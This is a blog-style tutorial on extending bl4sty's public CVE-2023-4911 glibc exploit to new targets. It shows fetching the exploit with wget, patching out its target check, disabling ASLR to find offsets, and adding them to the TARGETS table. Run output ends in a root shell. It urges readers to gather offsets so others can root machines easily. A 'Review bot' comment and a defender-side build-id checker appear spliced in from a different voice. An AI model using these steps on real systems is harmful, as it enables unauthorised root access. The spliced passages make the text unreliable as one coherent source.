Finding Offsets for bl4sty's CVE-2023-4911 Exploit.

bl4sty released a fantastically extendable exploit for the CVE-2023-4911 vulnerability.

The exploit code is nice and easy to understand, but after someone asked, I figured it was worth actually documenting how you add offsets/targets to the exploit.

Firstly, download the exploit script onto your target system.

$ wget https://haxx.in/files/gnu-acme.py

Next, slightly edit the script to remove an error check so that it will run without a "supported" target. See the diff output below. (Update: this patch is no longer required, since bl4sty has updated the exploit: it now detects whether ASLR is disabled and goes straight to target-finding mode instead of requiring the patch.)

$ diff gnu-acme.py.orig gnu-acme.py
275,276c275,276
<     if ld_build_id not in TARGETS.keys():
<         error("no target info found for build id %s" % ld_build_id)
---
> #    if ld_build_id not in TARGETS.keys():
> #        error("no target info found for build id %s" % ld_build_id)
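Review bot: commenting out the guard at lines 275-276 rather than deleting it leaves dead code, and with the check gone an unknown build id is no longer reported at this point in the script; since the update note above says the current release handles this case itself when ASLR is off, use the unmodified script and carry no local patch.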

Now switch to root and disable ASLR, then switch back to your unprivileged user account with su, so that the new shell is launched without ASLR.

$ sudo su - root 
# echo 0 > /proc/sys/kernel/randomize_va_space
# su - user
$  

Once you have done this, you should be able to simply run the exploit – if ASLR is disabled, it will run in "offset finding" mode, and emit a load of output. Pipe this with tee to a file. Wait until it completes.

$ python3 gnu-acme.py | tee -a offset_finder.log
<output snipped>

Once it's done printing, grep for the string "found working offset" in the logfile.

$ grep "found working offset" offset_finder.log 
found working offset for ld.so '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' -> 548 
<snipped>
found working offset for ld.so '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' -> 620

Pick whichever offset you like the look of from this output. Take a look at the "targets" dictionary in the exploit. It looks like this:

TARGETS = {
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "a99db3715218b641780b04323e4ae5953d68a927": 561,
}

It should be fairly obvious how to add your target. You should end up with something like the following:

TARGETS = {
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "a99db3715218b641780b04323e4ae5953d68a927": 561,
    "61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 548,
}
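As an added, defender-side check that is not part of bl4sty's exploit: the TARGETS table is keyed by the ld.so build id, so an administrator can read the same id straight from the loader's .note.gnu.build-id section and confirm that ASLR is enabled, which is the state the offset finder above cannot run in. The loader path and the little-endian ELF64 assumption are mine; the parser is written from the ELF note format, not taken from the exploit.

```python
"""Inventory check: report the dynamic loader's GNU build id (the key the
exploit's TARGETS table is indexed by) and whether ASLR is enabled."""
import struct
from pathlib import Path
from typing import Optional

NT_GNU_BUILD_ID = 3
LD_SO = "/lib64/ld-linux-x86-64.so.2"   # assumed path, as on the test VM above


def parse_build_id_note(data: bytes) -> Optional[str]:
    """Walk an ELF note section and return the NT_GNU_BUILD_ID desc as hex."""
    off = 0
    while off + 12 <= len(data):
        namesz, descsz, ntype = struct.unpack_from("<III", data, off)
        off += 12
        name = data[off:off + namesz]
        off += (namesz + 3) & ~3          # name and desc are 4-byte aligned
        desc = data[off:off + descsz]
        off += (descsz + 3) & ~3
        if name.rstrip(b"\0") == b"GNU" and ntype == NT_GNU_BUILD_ID:
            return desc.hex()
    return None


def gnu_build_id(path: str) -> Optional[str]:
    """Locate .note.gnu.build-id via the ELF64 section header table (little-endian)."""
    data = Path(path).read_bytes()
    if data[:4] != b"\x7fELF" or data[4] != 2:   # ELFCLASS64 only
        raise ValueError("not an ELF64 file: %s" % path)
    (e_shoff,) = struct.unpack_from("<Q", data, 0x28)
    e_shentsize, e_shnum, e_shstrndx = struct.unpack_from("<HHH", data, 0x3A)
    shdrs = [struct.unpack_from("<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
             for i in range(e_shnum)]
    strtab_off = shdrs[e_shstrndx][4]            # sh_offset of .shstrtab
    for sh in shdrs:
        name_start = strtab_off + sh[0]          # sh_name is an offset into .shstrtab
        name_end = data.index(b"\0", name_start)
        if data[name_start:name_end] == b".note.gnu.build-id":
            return parse_build_id_note(data[sh[4]:sh[4] + sh[5]])
    return None


def aslr_enabled() -> bool:
    """True unless randomize_va_space is 0, the setting the offset finder relies on."""
    return Path("/proc/sys/kernel/randomize_va_space").read_text().strip() != "0"


if __name__ == "__main__":
    print("ld.so build id:", gnu_build_id(LD_SO))
    print("ASLR enabled:", aslr_enabled())
```

Compare the printed build id against any published target list for this exploit; a match plus ASLR disabled is the combination worth alerting on.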

Now, drop out of your shell, re-enable ASLR, and go back to your original session.

$ exit
logout
# echo 1 > /proc/sys/kernel/randomize_va_space
# exit
logout
$

You can now run the exploit, and all things going well, land a root shell in some amount of time.

$ python3 gnu-acme.py 

      $$$ glibc ld.so (CVE-2023-4911) exploit $$$
            -- by blasty <peter@haxx.in> --      

[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] su = /usr/bin/su
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = 61ef896a699bb1c2e4e231642b2e1688b2f1a61e
[i] __libc_start_main = 0x29dc0
[i] using hax path b'"' at offset -20
[i] wrote patched libc.so.6
[i] using stack addr 0x7ffe10101003
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
.....................................................................................................................................# ** ohh... looks like we got a shell? **

id
uid=0(root) gid=1001(user) groups=1001(user),27(sudo)
# 

You may find some offsets work better than others, apparently? I noticed some are faster to pop shells than others on that test VM, but I am not terribly sure that my sample size is statistically significant. Further science is needed.

So, you have your homework. Go forth, harvest offset lists for the different build IDs out there, and share them with your friends so they can pop root shells with ease.

Most importantly, have fun.